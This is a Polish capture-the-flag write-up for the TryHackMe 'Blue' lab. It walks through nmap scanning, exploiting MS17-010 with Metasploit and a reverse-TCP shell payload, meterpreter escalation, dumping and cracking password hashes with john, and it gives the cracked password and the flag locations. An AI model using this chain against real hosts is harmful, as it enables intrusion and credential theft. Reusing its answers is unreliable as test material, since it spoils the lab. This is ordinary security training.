TryHackMe - Blue
Autor: adi7312
Poziom trudności: Łatwy
Task 1 - Recon
Dokonujemy skanowania podatnej maszyny, będziemy szukać poniższych informacji:
- Wersja OS
- Wersje usług hosta
- Liczba otwartych portów
nmap -O -sV -p- 10.10.251.166
Możemy więc odpowiedzieć na pierwsze zadane pytanie:
Teraz postaramy się ustalić na co podatna jest nasza maszyna, uruchamiamy polecenie:
nmap -sV -vv --script vuln 10.10.251.166
Jak możemy zauważyć nasza maszyna ma podatny na atak protokół SMB (nazwa podatności: ms17-10
). Możemy więc odpowiedzieć na ostatnie pytanie z tego zadania.
Task 2 - Gain Access
W celu zdobycia dostępu do systemu skorzystamy z frameworku Metasploit. W msfconsole wpisujemy polecenie: search CVE-2017-0143
(czyli szukamy podatności o podanym wcześniej przez nmapa identyfikatorze). Skorzystamy z pierwszzego exploita, wpisujemy polecenie use 0
.
Możemy zatem odpowiedzieć na pierwsze pytanie zadane w tym zadaniu:
Następnie sprawdzamy jakie parametry trzeba ustawić, robimy to poleceniem options
, jak widzimy musimy ustawić RHOSTS
(jest to jednocześnie odpowiedź do następnego pytania). Wpisujemy zatem polecenie set RHOSTS 10.10.251.166
.
Zanim wpiszemy exploit
powinniśmy jeszcze zmieć payload na poniższy:
set payload windows/x64/shell/reverse_tcp
Teraz możemy wpisać exploit
. Otrzymaliśmy shella.
Task 3 Escalate
Chcemy teraz ulepszyć shella do meterpretera, wychodzimy z naszej sesji (CTRL+Z) i szukamy w Metasploicie odpowiedniego modułu który ulepszy nam shella to meterpretera. Po znalezieniu wpisujemy use 0
i ustawiamy niezbędnę parametry (w tym przypadku SESSION).
Wpisujemy exploit
, po zakończeniu procesu tworzenia sesji meterpretera, możemy do niego przejść w tym celu wpisujemy sessions -i 3
. Możemy teraz potwierdzić że jesteśmy NT AUTHORITY\ SYSTEM (wchodzimy też w sesję 2, aby to potwierdzić).
W sesji meterpretea wpisujemy teraz polecenie ps
w celu wypisania wszystkich pracujących procesów, twórcy CTF karzą nam zapisać PID procesu który jest używany przez NT AUTHORITY\ SYSTEM i znajduje się na samym dole. Jednak twórcy jednocześnie ostrzegają że zmiana procesu jest niestabilna i może nie zadziałać w takim wypadku należy skorzyzstać z innego PID, my skorzystamy z PID: 712
.
Task 4 Cracking
Następnie dumpujemy hasła w meterpreterze poleceniem hashdump
. Możemy odpowiedzieć teraz na pierwsze pytanie:
Naszym zadaniem jest teraz złamanie hasła użytkownika john. Zapisujemy hash hasła johna do pliku hash.txt
. Następnie korzystamy z polecenie (do łamania hasła skorzystamy z pliku rockyou.txt).
john --format=nt --wordlist=/root/Desktop/wordlists/rockyou.txt /root/Desktop/hash.txt
Hasło Jon’a to alqfna22
.
Task 5 Find flags!
W celu znalezienie flag wpisujemy polecenie:
dir *flag*.* /s
Teraz mamy ładnie wypisane lokalizacje naszych flag, pozostało je jedynie odczytać.
Będziemy teraz wpisywać polecenie:type <lokalizacja flagi>
.
Możemy teraz uzupełnić odpowiedzi na stronie i zakończyć cały CTF.